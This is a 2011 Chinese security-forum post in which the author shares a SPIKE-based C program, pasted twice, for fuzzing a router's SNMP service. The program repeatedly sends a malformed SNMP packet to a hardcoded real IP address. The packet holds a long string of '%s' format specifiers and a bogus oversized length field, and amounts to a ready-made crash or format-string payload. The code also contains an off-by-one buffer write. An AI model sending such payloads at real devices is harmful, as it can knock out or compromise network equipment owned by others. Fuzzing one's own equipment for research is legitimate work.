-
-
[旧帖] [原创][申请邀请码]一个测试路由器SNMPv3的程序 0.00雪花
-
发表于: 2011-3-7 15:10 845
-
最近在学习SPIKE,把利用SPIKE进行测试的程序发一下,希望跟大家交流下
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "spike.h"
int
main (int argc, char ** argv)
{
char * target;
char buffer[1500000];
char *host;
int port;
struct spike * our_spike;
unsigned long retval;
int i;
target=argv[1];
printf("Target is %s\r\n",argv[1]);
port=atoi(argv[2]);
//signal(SIGPIPE,SIG_IGN);
our_spike = new_spike (); /*一个新的spike指针 */
if(our_spike==NULL)
{
fprintf(stderr,"Malloc failed trying to allocate a spike.\r\n");
exit(-1);
}
s_init_fuzzing (); /*do some basic initialization in spike.c */
setspike (our_spike); /*设置当前指针. 接下来调用的其他函数s_string(), s_binary()等将作用在这个指针上. 可以有多个 spike指针,调用setspike() 切换 */
s_resetfuzzvariable();
memset(buffer,0x41,sizeof(buffer));
buffer[sizeof(buffer)]=0;
for(i=0;i<500;i+=4)
{
memcpy(buffer+i,"%25s",4);
}
buffer[140000]=0;
printf("Buffer size = %d\r\n",strlen(buffer));
host=strdup("210.77.19.22");
while(1){
if (spike_send_udp ("210.77.19.129", 161) == 0)
{
printf ("Couldn't connect to host or send data!\r\n");
//spike_close_udp();
exit(-1);
} /*end for each fuzz string */ /*next variable*/
else
{
s_print_buffer();
/* s_binary("30 3a 02 01 03 30 0f 02 02 6e 36 02 03 00 ff e3 04 01 04 02 01 01 04 10 30 03 04 00 02 01 00 02 01 00 04 00 04 04 00 30 12 04 00 04 00 a0 0c 02 02 4f d8 02 01 00 02 01 00 30 00"); */
/* s_binary("30 34 02 01 03 30 0c 02 01 40 02 02 04 00 04 01 00 02 00 04 00 30 1f a0 1d 02 04 00 01 06 11 02 01 00 02 01 00 30 0f 30 0d 06 09 01 03 06 01 02 01 07 01 00 05 00"); */
s_binary("3081af02010004067075626c6963a081a10202092802010002010030819430819106818c4d73257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325"
"732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257381ffffffffffffffff7f0500");
//s_add_fuzzstring("b195");
//spike_send();
s_print_buffer();
memset(buffer,0x00,sizeof(buffer));
retval = 1;
while(retval!=-1)
{
s_fd_wait();
retval=read(our_spike->fd,buffer,1500);
printf("%s",buffer);
}
}
}
return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "spike.h"
int
main (int argc, char ** argv)
{
char * target;
char buffer[1500000];
char *host;
int port;
struct spike * our_spike;
unsigned long retval;
int i;
target=argv[1];
printf("Target is %s\r\n",argv[1]);
port=atoi(argv[2]);
//signal(SIGPIPE,SIG_IGN);
our_spike = new_spike (); /*一个新的spike指针 */
if(our_spike==NULL)
{
fprintf(stderr,"Malloc failed trying to allocate a spike.\r\n");
exit(-1);
}
s_init_fuzzing (); /*do some basic initialization in spike.c */
setspike (our_spike); /*设置当前指针. 接下来调用的其他函数s_string(), s_binary()等将作用在这个指针上. 可以有多个 spike指针,调用setspike() 切换 */
s_resetfuzzvariable();
memset(buffer,0x41,sizeof(buffer));
buffer[sizeof(buffer)]=0;
for(i=0;i<500;i+=4)
{
memcpy(buffer+i,"%25s",4);
}
buffer[140000]=0;
printf("Buffer size = %d\r\n",strlen(buffer));
host=strdup("210.77.19.22");
while(1){
if (spike_send_udp ("210.77.19.129", 161) == 0)
{
printf ("Couldn't connect to host or send data!\r\n");
//spike_close_udp();
exit(-1);
} /*end for each fuzz string */ /*next variable*/
else
{
s_print_buffer();
/* s_binary("30 3a 02 01 03 30 0f 02 02 6e 36 02 03 00 ff e3 04 01 04 02 01 01 04 10 30 03 04 00 02 01 00 02 01 00 04 00 04 04 00 30 12 04 00 04 00 a0 0c 02 02 4f d8 02 01 00 02 01 00 30 00"); */
/* s_binary("30 34 02 01 03 30 0c 02 01 40 02 02 04 00 04 01 00 02 00 04 00 30 1f a0 1d 02 04 00 01 06 11 02 01 00 02 01 00 30 0f 30 0d 06 09 01 03 06 01 02 01 07 01 00 05 00"); */
s_binary("3081af02010004067075626c6963a081a10202092802010002010030819430819106818c4d73257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325"
"732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257325732573257381ffffffffffffffff7f0500");
//s_add_fuzzstring("b195");
//spike_send();
s_print_buffer();
memset(buffer,0x00,sizeof(buffer));
retval = 1;
while(retval!=-1)
{
s_fd_wait();
retval=read(our_spike->fd,buffer,1500);
printf("%s",buffer);
}
}
}
return 0;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
看原图
赞赏
雪币:
留言: